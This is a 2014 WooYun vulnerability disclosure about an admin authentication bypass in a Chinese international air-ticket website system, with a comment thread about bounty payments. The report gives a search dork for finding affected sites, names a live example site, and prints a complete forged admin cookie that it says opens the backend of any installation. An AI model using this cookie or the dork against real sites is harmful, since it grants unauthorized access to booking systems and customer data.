当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067538

漏洞标题:某国际机票建站系统权限绕过导致可通杀进入后台

相关厂商:际珂软件

漏洞作者: zph

提交时间:2014-07-07 17:09

修复时间:2014-10-05 17:10

公开时间:2014-10-05 17:10

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-07: 细节已通知厂商并且等待厂商处理中
2014-07-12: 厂商已经确认,细节仅向厂商公开
2014-07-15: 细节向第三方安全合作伙伴开放
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

简要描述:

某国际机票建站系统后台权限绕过导致可进入后台

详细说明:

搜索 inurl:Flight/InternationalTicket.asp
找到约 3,240 条结果 (用时 0.23 秒)
用的人不多,但是也是有一些网站在用的 比如 http://www.tokair.com/

111.png


cookies:

AJSTAT_ok_times=2; pgv_pvi=8454968320; AJSTAT_ok_times=3; AJSTAT_ok_pages=1; ASPSESSIONIDCSBRDTCA=LNMNNDMADPIJNFCFLAPAOCEE; GetCode=9375; Admin%5FLoginTime=2013%2D9%2D19+1%3A57%3A37; AdminLevel=1; AdminRight=Manager%5FStaff%5FView%2CManager%5FStaff%5FAdd%2CManager%5FStaff%5FManage%2CManager%5FStaff%5FRight%2CManager%5FMember%5FView%2CManager%5FMember%5FAdd%2CManager%5FMember%5FManage%2CManager%5FMember%5FRight%2CManager%5FLogView%2CManager%5FLogSearch%2CSystem%5FConfig%2CSystem%5FCity%2CSystem%5FFinancial%2CSystem%5FMessage%2CCustom%5FManage%2CCustom%5FAgent%2COrder%5FFlight%5FAdd%2COrder%5FFlight%5FView%2COrder%5FFlight%5FDeal%2COrder%5FFlight%5FManage%2COrder%5FHotel%5FAdd%2COrder%5FHotel%5FView%2COrder%5FHotel%5FDeal%2COrder%5FHotel%5FManage%2COrder%5FTravel%5FAdd%2COrder%5FTravel%5FView%2COrder%5FTravel%5FDeal%2COrder%5FTravel%5FManage%2CNews%5FCenter%2CNews%5FWeb%2CAir%5FCab%2CAir%5FMultiCab%2CAir%5FSpePrice%2CAir%5FInternal%2CAir%5FBack%2CAir%5FMultiBack%2CAir%5FMinPrice%2CAir%5FAirport%2CAir%5FCarrier%2CAir%5FCabVisor%2CAir%5FFlight%2CHotel%5FInfo%2CHotel%5FArea%2CHotel%5FHotCity%2CTour%5FInfo%2CDestination%5FInfo%2CBusiness%5FView%2CBusiness%5FAdd%2CBusiness%5FManage%2CPost%5FView%2CPost%5FAdd%2CPost%5FManage%2COrder%5FFlight%5FManage%5FA%2COrder%5FFlight%5FManage%5FB%2COrder%5FFlight%5FManage%5FP%2COrder%5FFlight%5FManage%5FF%2COrder%5FFlight%5FManage%5FG%2CFlight%5FOrder%5FAdd%2CFlight%5FOrder%5FSearch%2CFlight%5FOrder%5FView%2CFlight%5FOrder%5FDeal%2CFlight%5FOrder%5FEdit%2CFlight%5FOrder%5FDel%2CFlight%5FOrder%5FSL%2CFlight%5FOrder%5FQX%2CFlight%5FOrder%5FHY%2CFlight%5FOrder%5FPay%2CFlight%5FOrder%5FCP%2CFlight%5FOrder%5FPS%2CFlight%5FOrder%5FJS%2CFlight%5FOrder%5FGQ%2CFlight%5FOrder%5FJ%5FS%2CFlight%5FOrder%5FDY%2CSpePrice%5FOrder%5FView%2CSpePrice%5FOrder%5FHandle%2CSystem%5F2%5F1%2CSystem%5F2%5F2%2CSystem%5F2%5F3%2CSystem%5F2%5F10%2CSystem%5F2%5F11%2CSystem%5F2%5F4%2CSystem%5F2%5F6%2CSystem%5F2%5F7%2CSystem%5F2%5F8%2CSystem%5F2%5F9%2CFlightGj%5F1%2CFlightGj%5F5%2CCustom%5FSeach%2CCustom%5FView%2CCustom%5FAdd%2CCustom%5FEdit%2CCustom%5FDel%2CCard%5FImport%2CCard%5FManage%2CUser%5FGrade%5FManage%2CUser%5FJifen%5FManage%2CUser%5FJianyi%2CGife%5F1%2CGife%5F2%2CGife%5F3%2CGife%5F4%2CSystem%5F5%5F1%2CSystem%5F5%5F2%2CSystem%5F5%5F3%2CSystem%5F5%5F4%2CSystem%5F5%5F5%2CPay%5FSuccess%5F1%2CSystem%5F1%5F1%2CSystem%5F1%5F8%2CSystem%5F1%5F9%2CSystem%5F1%5F2%2CSystem%5F1%5F5%2CSystem%5F1%5F4%2CSystem%5F1%5F3%2CSystem%5F1%5F6%2CSystem%5F1%5F7%2CSystem%5F4%5F1%2CSystem%5F4%5F2%2CSystem%5F6%5F1%2CSystem%5F6%5F2%2CSystem%5F6%5F3%2CSystem%5F6%5F4%2CSystem%5F6%5F5%2CSystem%5F6%5F6%2CSystem%5F6%5F7; Admin%5FKeepPass=abc; AdminLogin=abc; Admin%5FConfig=%7C%7C; AdminLocat; Admin%5FUidStr=800639%40XTKIQYS5%40admintrip%40%E7%AE%A1%E7%90%86%E5%91%98; Admin%5Fuid=1068; Time934fdiou22=2013%2D9%2D19+1%3A57%3A40; Time934fdiou=2013%2D9%2D19+1%3A57%3A40


这个cookies具体为什么可以通杀,你们懂得,不多解释呵呵
修改cookies后即可进入后台
部分美图:

1.png


2.png


3.png


4.png


6.png


7.png

漏洞证明:

1.png

修复方案:

你懂得

版权声明:转载请注明来源 zph@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-07-12 13:01

厂商回复:

CNVD确认并复现所述情况(通过实例确认通用性),尝试联系软件生产厂商际柯软件公司,联系***,对方拒绝提供邮箱并直接挂断电话。后向网站客服邮箱发送通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-07 17:28 | Haswell ( 普通白帽子 | Rank:167 漏洞数:18 | HorizonSec @ RDFZ)

  2. 2014-07-07 17:30 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @Haswell thx :)

  3. 2014-07-09 11:10 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @ZPH这个是小厂商吗

  4. 2014-07-09 11:24 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 不清楚呃 他们官网 http://www.jikee.net/

  5. 2014-07-09 11:43 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @ZPH我在360库带里投一个这个系统的注入漏洞居然是小厂商啊,不过估计在乌云应该是大厂商啊

  6. 2014-07-09 13:47 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 :( 我不清楚呃……

  7. 2014-07-12 06:07 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @cncert国家互联网应急中心 怎么确认这么慢啊……

  8. 2014-07-13 20:23 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    另外,@际珂软件 用户密码貌似全是明文记录的,是否至少应该用MD5加个密?

  9. 2014-07-25 12:31 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @xsser @疯狗 不给rmb么?

  10. 2014-07-25 17:11 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @zph 这个有奖金

  11. 2014-07-25 19:43 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @疯狗 好的,感谢 :)

  12. 2014-07-25 20:22 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @疯狗 请问像这种通用 WooYun: 某通用型企业建站系统SQL注入 有奖金吗

  13. 2014-07-28 10:51 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @疯狗 求审核http://www.wooyun.org/bugs/wooyun-2014-069891/trace/4420f8ad8f2d7求奖金 WooYun: 某通用型企业建站系统SQL注入 WooYun: 某高校管理系统存在2处SQL注入 WooYun: 某通用型政府建站系统由一个越权页面+恶意修改导致网站瞬间出错

  14. 2014-07-28 11:00 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 呃,别在这说啊,你去zone里面发帖at,这是漏洞,不是帖子

  15. 2014-08-14 18:37 | 番茄师傅 ( 普通白帽子 | Rank:254 漏洞数:59 | http://www.tomatoyu.com/)

    对方拒绝提供邮箱并直接挂断电话。后向网站客服邮箱发送通报。

  16. 2014-08-14 18:38 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @番茄师傅 说明这厂商态度也不咋地。

  17. 2014-08-14 18:42 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    这个发的这么快的奖金

  18. 2014-08-14 18:43 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    尼玛,这个差不多十来天就发奖金了

  19. 2014-08-14 19:24 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @U神 呵呵。

  20. 2014-08-14 19:24 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 呵呵。

  21. 2014-08-14 19:34 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @zph 哈哈 大牛你好

  22. 2014-08-14 20:29 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 你好

  23. 2014-08-14 20:29 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 这个漏洞奖金确实发的快,其他的好几个到现在还没发

  24. 2014-08-14 20:52 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @zph 其他的你有的等了啊

  25. 2014-08-14 21:01 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

    @贫道来自河北 哈哈

  26. 2014-08-14 21:07 | 贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)

    @zph 我7月4号的都没法呢,现在一般的通用奖金才发到6月20号